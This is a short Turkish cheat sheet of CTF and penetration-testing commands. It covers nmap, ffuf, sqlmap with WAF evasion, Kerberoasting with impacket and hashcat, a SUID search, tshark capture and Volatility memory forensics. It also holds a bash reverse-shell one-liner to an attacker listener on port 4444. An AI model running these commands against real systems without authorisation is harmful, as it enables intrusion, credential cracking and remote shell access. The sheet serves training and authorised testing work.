CTF yarışmalarında ve sızma testlerinde en sık kullandığımız komutlar, cheat sheet'ler ve referans kılavuzları.
Tüm TCP portlarını hızlıca tarar, varsayılan scriptleri çalıştırır ve servis sürümlerini tespit eder.
nmap -sC -sV -p- -T4 --min-rate 1000 -oN scan.txt 10.10.10.xHızlı fuzzer ile hedef web uygulamasında gizli API dizinlerini ve kaynaklarını tespit eder.
ffuf -u http://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -mc 200,301,302 -fc 404 -t 40Verilen URL'deki SQLi açığını tespit eder, veritabanı adlarını çeker ve WAF atlatmak için random user-agent kullanır.
sqlmap -u 'http://target.com/page?id=1' --batch --dbs --random-agentActive Directory etki alanında SPN kaydı olan servis hesaplarının TGS biletlerini offline kırmak üzere çeker.
impacket-GetUserSPNs -request -dc-ip 10.10.10.10 ulusiber.local/ogrenci:Sifre123 -outputfile kerb_hashes.txtÇekilen Kerberos TGS biletlerinin NTLM parola hash'lerini GPU hızlandırmasıyla kırar.
hashcat -m 13100 -a 0 kerb_hashes.txt /usr/share/wordlists/rockyou.txt --rules-file=best64.rulePrivilege escalation aşamasında root yetkisiyle çalışan SUID bitli binary'leri tespit eder.
find / -perm -u=s -type f 2>/dev/nullHedef makineden saldırgan dinleyicisine doğrudan interaktif bash terminal bağlantısı fırlatır.
bash -i >& /dev/tcp/10.10.14.x/4444 0>&1Komut satırından ağ arayüzünü dinleyerek geçen tüm HTTP isteklerini ve URI'lerini filtreler.
tshark -i eth0 -Y 'http.request.method in {"GET","POST"}' -T fields -e http.host -e http.request.uriAlınmış RAM imajı üzerinden çalışan tüm süreçleri, PID'leri ve başlangıç zamanlarını dökümler.
vol3 -f memdump.raw windows.pslistPAGE_EXECUTE_READWRITE bellek alanlarını tarayarak process hollowing ve Cobalt Strike beacon enjeksiyonlarını tespit eder.
vol3 -f memdump.raw windows.malfind